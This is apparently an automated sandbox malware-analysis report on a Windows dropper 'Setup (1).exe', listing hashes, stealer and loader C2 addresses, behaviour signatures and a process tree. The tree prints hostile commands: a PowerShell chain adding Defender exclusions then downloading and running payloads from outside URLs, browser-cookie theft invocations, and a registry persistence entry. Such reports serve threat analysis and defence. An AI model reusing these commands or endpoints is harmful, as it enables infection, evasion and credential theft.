Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    534s
  • max time network
    1805s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    21-08-2021 10:21

General

  • Target

    Setup (1).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

redline

Botnet

20_8_rs

C2

jekorikani.xyz:80

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 10 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 5 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Zloader, Terdot, DELoader, ZeusSphinx

    Zloader is a malware strain that was initially discovered back in August 2015.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 1 IoCs
  • Blocklisted process makes network request 19 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 12 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 14 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 24 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 13 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 28 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 51 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 16 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 39 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1244
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
      1⤵
        PID:1236
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s SENS
        1⤵
          PID:1420
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
            PID:2808
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
            1⤵
              PID:2796
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Browser
              1⤵
                PID:2720
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                1⤵
                  PID:2556
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                  1⤵
                    PID:2544
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                    1⤵
                      PID:1956
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1076
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:396
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          2⤵
                            PID:7944
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                          1⤵
                            PID:336
                          • C:\Users\Admin\AppData\Local\Temp\Setup (1).exe
                            "C:\Users\Admin\AppData\Local\Temp\Setup (1).exe"
                            1⤵
                            • Checks computer location settings
                            • Modifies system certificate store
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of WriteProcessMemory
                            PID:764
                            • C:\Users\Admin\Documents\0rFkY2OvEvp1jAHqy_uXMGkZ.exe
                              "C:\Users\Admin\Documents\0rFkY2OvEvp1jAHqy_uXMGkZ.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3556
                            • C:\Users\Admin\Documents\o2CHzOaFL3BtKOqBMNnHQbIq.exe
                              "C:\Users\Admin\Documents\o2CHzOaFL3BtKOqBMNnHQbIq.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:2872
                            • C:\Users\Admin\Documents\Ooix92CGqrCgwEzUVRUC0sez.exe
                              "C:\Users\Admin\Documents\Ooix92CGqrCgwEzUVRUC0sez.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:2100
                              • C:\Users\Admin\Documents\Ooix92CGqrCgwEzUVRUC0sez.exe
                                "C:\Users\Admin\Documents\Ooix92CGqrCgwEzUVRUC0sez.exe" -q
                                3⤵
                                • Executes dropped EXE
                                PID:4644
                            • C:\Users\Admin\Documents\W2P3u4OI_g1pCRXIdWa1nklA.exe
                              "C:\Users\Admin\Documents\W2P3u4OI_g1pCRXIdWa1nklA.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2308
                            • C:\Users\Admin\Documents\tXsDl6sShQoInGeUk0V_z5MV.exe
                              "C:\Users\Admin\Documents\tXsDl6sShQoInGeUk0V_z5MV.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4072
                              • C:\Users\Admin\AppData\Roaming\2433586.exe
                                "C:\Users\Admin\AppData\Roaming\2433586.exe"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious use of AdjustPrivilegeToken
                                PID:632
                              • C:\Users\Admin\AppData\Roaming\7929651.exe
                                "C:\Users\Admin\AppData\Roaming\7929651.exe"
                                3⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                PID:4600
                                • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                  "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  PID:4244
                              • C:\Users\Admin\AppData\Roaming\1630908.exe
                                "C:\Users\Admin\AppData\Roaming\1630908.exe"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4576
                            • C:\Users\Admin\Documents\okUDJEb2xB80PnPcPvUxNnsV.exe
                              "C:\Users\Admin\Documents\okUDJEb2xB80PnPcPvUxNnsV.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: MapViewOfSection
                              PID:2204
                            • C:\Users\Admin\Documents\_ruVzR0zdCzpWCT9iM_UDLcn.exe
                              "C:\Users\Admin\Documents\_ruVzR0zdCzpWCT9iM_UDLcn.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:736
                            • C:\Users\Admin\Documents\pYyX8YTemR3r89lafggqlnjA.exe
                              "C:\Users\Admin\Documents\pYyX8YTemR3r89lafggqlnjA.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:2792
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2792 -s 660
                                3⤵
                                • Program crash
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4552
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2792 -s 676
                                3⤵
                                • Program crash
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4148
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2792 -s 644
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4652
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2792 -s 684
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4604
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2792 -s 1160
                                3⤵
                                • Program crash
                                PID:3260
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2792 -s 1120
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3992
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2792 -s 1116
                                3⤵
                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                • Program crash
                                PID:4204
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2792 -s 1148
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3956
                            • C:\Users\Admin\Documents\WL57Ckb9gh8h9LnQI09Fs3bj.exe
                              "C:\Users\Admin\Documents\WL57Ckb9gh8h9LnQI09Fs3bj.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:504
                            • C:\Users\Admin\Documents\to8xrXKaAtVutNhpIwSeO9M5.exe
                              "C:\Users\Admin\Documents\to8xrXKaAtVutNhpIwSeO9M5.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3300
                            • C:\Users\Admin\Documents\TPaTHovW_VzXwiV0mMRsG0y0.exe
                              "C:\Users\Admin\Documents\TPaTHovW_VzXwiV0mMRsG0y0.exe"
                              2⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              • Suspicious use of WriteProcessMemory
                              PID:2396
                              • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:4268
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  4⤵
                                    PID:4980
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5248
                                • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                  "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  PID:4340
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:4212
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5060
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5236
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5360
                                  • C:\Windows\system32\WerFault.exe
                                    C:\Windows\system32\WerFault.exe -u -p 4340 -s 1560
                                    4⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    PID:5164
                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                  "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Checks whether UAC is enabled
                                  • Drops file in Program Files directory
                                  PID:4292
                              • C:\Users\Admin\Documents\8aQLGLFykvQPGqJYHBzxw59U.exe
                                "C:\Users\Admin\Documents\8aQLGLFykvQPGqJYHBzxw59U.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:4020
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 760
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4640
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 812
                                  3⤵
                                  • Program crash
                                  PID:3692
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 764
                                  3⤵
                                  • Program crash
                                  PID:5576
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 824
                                  3⤵
                                  • Program crash
                                  PID:1636
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 956
                                  3⤵
                                  • Program crash
                                  PID:5992
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 996
                                  3⤵
                                  • Program crash
                                  PID:4192
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 1016
                                  3⤵
                                  • Program crash
                                  PID:5960
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 1344
                                  3⤵
                                  • Program crash
                                  PID:5132
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 1376
                                  3⤵
                                  • Program crash
                                  PID:5656
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 1416
                                  3⤵
                                  • Program crash
                                  PID:6496
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 1508
                                  3⤵
                                  • Program crash
                                  PID:2256
                              • C:\Users\Admin\Documents\WcTibqOcQTNcvAzpG_0eQvyK.exe
                                "C:\Users\Admin\Documents\WcTibqOcQTNcvAzpG_0eQvyK.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:2392
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                                  3⤵
                                    PID:5076
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                      4⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4124
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                      4⤵
                                        PID:2020
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                        4⤵
                                          PID:1368
                                    • C:\Users\Admin\Documents\TIytTeEsFvTWc0mnLDelKT9E.exe
                                      "C:\Users\Admin\Documents\TIytTeEsFvTWc0mnLDelKT9E.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:3020
                                      • C:\Users\Admin\Documents\TIytTeEsFvTWc0mnLDelKT9E.exe
                                        C:\Users\Admin\Documents\TIytTeEsFvTWc0mnLDelKT9E.exe
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1448
                                      • C:\Users\Admin\Documents\TIytTeEsFvTWc0mnLDelKT9E.exe
                                        C:\Users\Admin\Documents\TIytTeEsFvTWc0mnLDelKT9E.exe
                                        3⤵
                                        • Executes dropped EXE
                                        PID:4916
                                    • C:\Users\Admin\Documents\JLNF5_s0R2yAf2EXq8ToTaCx.exe
                                      "C:\Users\Admin\Documents\JLNF5_s0R2yAf2EXq8ToTaCx.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Checks BIOS information in registry
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:860
                                    • C:\Users\Admin\Documents\QFgRb2HV22uWEx2ecJ7kfS6p.exe
                                      "C:\Users\Admin\Documents\QFgRb2HV22uWEx2ecJ7kfS6p.exe"
                                      2⤵
                                        PID:632
                                        • C:\Users\Admin\Documents\QFgRb2HV22uWEx2ecJ7kfS6p.exe
                                          C:\Users\Admin\Documents\QFgRb2HV22uWEx2ecJ7kfS6p.exe
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4908
                                      • C:\Users\Admin\Documents\K8JwTr28Gu6toOzJXb2FZ30C.exe
                                        "C:\Users\Admin\Documents\K8JwTr28Gu6toOzJXb2FZ30C.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:1444
                                        • C:\Users\Admin\Documents\K8JwTr28Gu6toOzJXb2FZ30C.exe
                                          C:\Users\Admin\Documents\K8JwTr28Gu6toOzJXb2FZ30C.exe
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4936
                                      • C:\Users\Admin\Documents\u6m89TssifW1L4HbZuPyEukW.exe
                                        "C:\Users\Admin\Documents\u6m89TssifW1L4HbZuPyEukW.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1316
                                      • C:\Users\Admin\Documents\HU07iO66hQ7miAtFJTTg9SwR.exe
                                        "C:\Users\Admin\Documents\HU07iO66hQ7miAtFJTTg9SwR.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2612
                                      • C:\Users\Admin\Documents\a0LNHWiYObI0HdjOUX7t86CB.exe
                                        "C:\Users\Admin\Documents\a0LNHWiYObI0HdjOUX7t86CB.exe"
                                        2⤵
                                          PID:4212
                                          • C:\Users\Admin\Documents\a0LNHWiYObI0HdjOUX7t86CB.exe
                                            C:\Users\Admin\Documents\a0LNHWiYObI0HdjOUX7t86CB.exe
                                            3⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5044
                                        • C:\Users\Admin\Documents\INUVVLVs5VeGYRQ28kptDT7L.exe
                                          "C:\Users\Admin\Documents\INUVVLVs5VeGYRQ28kptDT7L.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          PID:2976
                                          • C:\Users\Admin\AppData\Local\Temp\is-IE4G2.tmp\INUVVLVs5VeGYRQ28kptDT7L.tmp
                                            "C:\Users\Admin\AppData\Local\Temp\is-IE4G2.tmp\INUVVLVs5VeGYRQ28kptDT7L.tmp" /SL5="$20248,138429,56832,C:\Users\Admin\Documents\INUVVLVs5VeGYRQ28kptDT7L.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious use of FindShellTrayWindow
                                            PID:2344
                                            • C:\Users\Admin\AppData\Local\Temp\is-MF09F.tmp\Setup.exe
                                              "C:\Users\Admin\AppData\Local\Temp\is-MF09F.tmp\Setup.exe" /Verysilent
                                              4⤵
                                              • Executes dropped EXE
                                              • Drops file in Program Files directory
                                              PID:1104
                                              • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                                "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                                5⤵
                                                • Executes dropped EXE
                                                PID:4220
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 760
                                                  6⤵
                                                  • Program crash
                                                  PID:7000
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 788
                                                  6⤵
                                                  • Program crash
                                                  PID:6820
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 812
                                                  6⤵
                                                  • Program crash
                                                  PID:5408
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 824
                                                  6⤵
                                                  • Program crash
                                                  PID:4720
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 960
                                                  6⤵
                                                  • Program crash
                                                  PID:7596
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 988
                                                  6⤵
                                                  • Program crash
                                                  PID:7984
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 1048
                                                  6⤵
                                                  • Program crash
                                                  PID:7272
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 1324
                                                  6⤵
                                                  • Program crash
                                                  PID:7048
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 1412
                                                  6⤵
                                                  • Program crash
                                                  PID:5288
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 1576
                                                  6⤵
                                                  • Program crash
                                                  PID:7448
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 1656
                                                  6⤵
                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                  • Program crash
                                                  PID:7708
                                              • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                5⤵
                                                • Executes dropped EXE
                                                PID:2816
                                                • C:\Users\Admin\AppData\Local\Temp\is-82N8J.tmp\Inlog.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-82N8J.tmp\Inlog.tmp" /SL5="$10302,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:5176
                                                  • C:\Users\Admin\AppData\Local\Temp\is-3JQFQ.tmp\Setup.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\is-3JQFQ.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                    7⤵
                                                      PID:5240
                                                      • C:\Users\Admin\AppData\Local\Temp\is-5FL34.tmp\Setup.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-5FL34.tmp\Setup.tmp" /SL5="$20426,17369807,721408,C:\Users\Admin\AppData\Local\Temp\is-3JQFQ.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                        8⤵
                                                        • Loads dropped DLL
                                                        • Drops file in Program Files directory
                                                        • Suspicious use of FindShellTrayWindow
                                                        PID:6264
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-KM8O6.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                          9⤵
                                                            PID:7060
                                                            • C:\Windows\SysWOW64\expand.exe
                                                              expand C:\Users\Admin\AppData\Local\Temp\is-KM8O6.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                              10⤵
                                                              • Drops file in Windows directory
                                                              PID:5656
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                            9⤵
                                                              PID:9660
